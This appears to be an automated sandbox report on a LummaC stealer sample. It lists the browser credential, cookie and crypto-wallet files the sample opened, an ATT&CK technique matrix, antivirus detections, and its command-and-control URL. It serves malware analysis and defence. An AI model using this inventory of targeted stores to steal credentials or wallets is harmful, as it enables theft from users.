          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          Process Injection          		34
          Virtualization/Sandbox Evasion          		1
          OS Credential Dumping          		751
          Security Software Discovery          		Remote Services31
          Data from Local System          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Process Injection          		LSASS Memory34
          Virtualization/Sandbox Evasion          		Remote Desktop ProtocolData from Removable Media2
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
          Obfuscated Files or Information          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive113
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
          Software Packing          		NTDS1
          File and Directory Discovery          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets223
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe45%ReversingLabsWin32.Trojan.Symmi
          file.exe100%AviraTR/Crypt.TPM.Gen
          file.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://property-imper.sbs/api$#0%Avira URL Cloudsafe
          https://property-imper.sbs/apiZf0%Avira URL Cloudsafe
          https://property-imper.sbs/apis#N0%Avira URL Cloudsafe
          https://property-imper.sbs/apiH#0%Avira URL Cloudsafe
          https://property-imper.sbs:443/api.default-release/key4.dbPK0%Avira URL Cloudsafe
          https://property-imper.sbs:443/apiK0%Avira URL Cloudsafe
          https://property-imper.sbs/lmy0%Avira URL Cloudsafe
          https://property-imper.sbs/4m0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          property-imper.sbs
          		104.21.33.116
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://property-imper.sbs/apifalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://property-imper.sbs/apiZffile.exe, 00000000.00000002.2328020896.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325260776.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://property-imper.sbs:443/apifile.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://property-imper.sbs/api$#file.exe, 00000000.00000003.2266053937.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://property-imper.sbs/apis#Nfile.exe, 00000000.00000002.2328084587.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325456921.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325166462.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://property-imper.sbs/lmyfile.exe, 00000000.00000003.2172133728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://property-imper.sbs/file.exe, 00000000.00000003.2217401886.0000000005580000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195121750.000000000557E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194913302.000000000557E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.microfile.exe, 00000000.00000003.2325260776.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172133728.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246523182.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
